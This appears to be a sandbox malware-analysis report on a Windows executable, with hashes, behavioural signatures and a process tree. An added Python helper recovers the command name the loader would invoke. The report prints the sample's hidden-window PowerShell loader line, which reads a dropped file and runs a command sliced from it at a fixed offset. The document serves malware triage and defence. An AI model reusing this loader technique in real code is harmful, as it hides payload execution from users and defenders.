Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231201-en -
resource tags
arch:x64, arch:x86, image:win7-20231201-en, locale:en-us, os:windows7-x64, system -
submitted
07/12/2023, 19:22
Static task
static1
Behavioral task
behavioral1
Sample
581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1aexe.exe
Resource
win7-20231201-en
Behavioral task
behavioral2
Sample
581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1aexe.exe
Resource
win10v2004-20231127-en
General
-
Target
581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1aexe.exe
-
Size
757KB
-
MD5
66bca9391d3610d5f16e8cc8db45a962
-
SHA1
587171885e9dd7e76ec95a29827af6766f0acba5
-
SHA256
581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1a
-
SHA512
887c958342e2281b7b593b92d1fc7e4d00b0891e16672a6433ff3475df2bf4809b6acff84fc39b38a6fba067110ee00553ece48a2ad1e9630603f702289f3885
-
SSDEEP
12288:g2Qw6UNMMIowZWWa7HcN+FlB5wGYRveB0ud4n8KyPHkO7Eb:g9w6UNMvowZPmHcgFv5whemnTuEP
Malware Config
Signatures
-
Loads dropped DLL 1 IoCs
pid   Process
2332  581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1aexe.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid   Process
2820  powershell.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
description              pid   Process
Token: SeDebugPrivilege  2820  powershell.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description                       pid   Process                                                                   procid_target
PID 2332 wrote to memory of 2820  2332  581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1aexe.exe  29
PID 2332 wrote to memory of 2820  2332  581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1aexe.exe  29
PID 2332 wrote to memory of 2820  2332  581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1aexe.exe  29
PID 2332 wrote to memory of 2820  2332  581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1aexe.exe  29
Processes
-
C:\Users\Admin\AppData\Local\Temp\581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1aexe.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1aexe.exe"
Depth: 1
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID: 2332
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell.exe" -windowstyle hidden "$genom=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Semplices\Amortisabel\sphygmomanometric.Mat';$Tintometric14=$genom.SubString(70960,3);.$Tintometric14($genom)"
Depth: 2 (child of PID 2332)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2820
-
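The PowerShell child above is the security-relevant part of this tree: it runs with a hidden window, reads a dropped file into `$genom`, takes the three characters at offset 70960 of that content as a command name, and uses the `.` call operator to invoke that command with the whole file content as its argument. The command name and the real payload are therefore never visible on the command line. The following triage helper is an added example, not part of the sandbox report or of the sample; it parses that command-line shape, pulls out the path, offset and length, and, given a copy of the dropped file, recovers the three characters the loader would have invoked without executing them. The `.Mat` file itself is not on this page, so `CONSTRUCTED_MAT` is a constructed stand-in with a placeholder command name; the real content is unknown.

```python
import re

# Command line copied from the report's process tree (PID 2820).
REPORT_CMDLINE = (
    '"powershell.exe" -windowstyle hidden "$genom=Get-Content '
    "'C:\\Users\\Admin\\AppData\\Local\\Temp\\Semplices\\Amortisabel\\sphygmomanometric.Mat';"
    '$Tintometric14=$genom.SubString(70960,3);.$Tintometric14($genom)"'
)

# Constructed stand-in for the dropped .Mat file (the real file is not on this page):
# filler, a three-character placeholder command name at offset 70960, then more filler
# standing in for the payload. This is an assumption for the demo, not recovered content.
CONSTRUCTED_MAT = ("A" * 70960) + "iex" + ("B" * 128)

# Get-Content into $blob; $cmd = $blob.SubString(off, len); then `.` or `&` invokes $cmd($blob).
# Backreferences force the same variable names across the three statements.
LOADER_RE = re.compile(
    r"\$(?P<blob>\w+)\s*=\s*Get-Content\s+'(?P<path>[^']+)'\s*;\s*"
    r"\$(?P<cmd>\w+)\s*=\s*\$(?P=blob)\.SubString\(\s*(?P<off>\d+)\s*,\s*(?P<len>\d+)\s*\)\s*;\s*"
    r"[.&]\s*\$(?P=cmd)\s*\(\s*\$(?P=blob)\s*\)",
    re.IGNORECASE,
)


def parse_loader(cmdline):
    """Return path/offset/length for a Get-Content -> SubString -> invoke chain, or None."""
    m = LOADER_RE.search(cmdline)
    if m is None:
        return None
    return {
        "path": m.group("path"),
        "offset": int(m.group("off")),
        "length": int(m.group("len")),
        # -windowstyle hidden, or its accepted abbreviation -w hidden
        "hidden_window": re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.I) is not None,
    }


def recover_invoked_command(file_text, offset, length):
    """Slice out the characters the loader would turn into a command name, without running them.

    SubString(startIndex, length) on a .NET string raises when the range is out of bounds;
    here that case returns None so a truncated or wrong file is reported rather than crashing.
    """
    if offset < 0 or length <= 0 or offset + length > len(file_text):
        return None
    return file_text[offset:offset + length]


def triage(cmdline, file_text=None):
    """Combine both steps: parse the command line and, if the file is available, recover the command."""
    info = parse_loader(cmdline)
    if info is None:
        return None
    if file_text is not None:
        info["command"] = recover_invoked_command(file_text, info["offset"], info["length"])
        info["payload_length"] = len(file_text)
    return info


if __name__ == "__main__":
    print(triage(REPORT_CMDLINE, CONSTRUCTED_MAT))
```

Two points follow from the command line that a practitioner should check before trusting the recovered value: `Get-Content` without `-Raw` returns one string per line, and `.SubString()` on a single string only works because the dropped file is a single line, so read the file the same way (one line, as text) before slicing; and the offset is a UTF-16 character index in PowerShell, which matches a Python `str` index only for BMP text, so decode the file to text rather than slicing bytes.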
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
6KB
MD5
3d366250fcf8b755fce575c75f8c79e4
SHA1
2ebac7df78154738d41aac8e27d7a0e482845c57
SHA256
8bdd996ae4778c6f829e2bcb651c55efc9ec37eeea17d259e013b39528dddbb6
SHA512
67d2d88de625227ccd2cb406b4ac3a215d1770d385c985a44e2285490f49b45f23ce64745b24444e2a0f581335fda02e913b92781043e8dfd287844435ba9094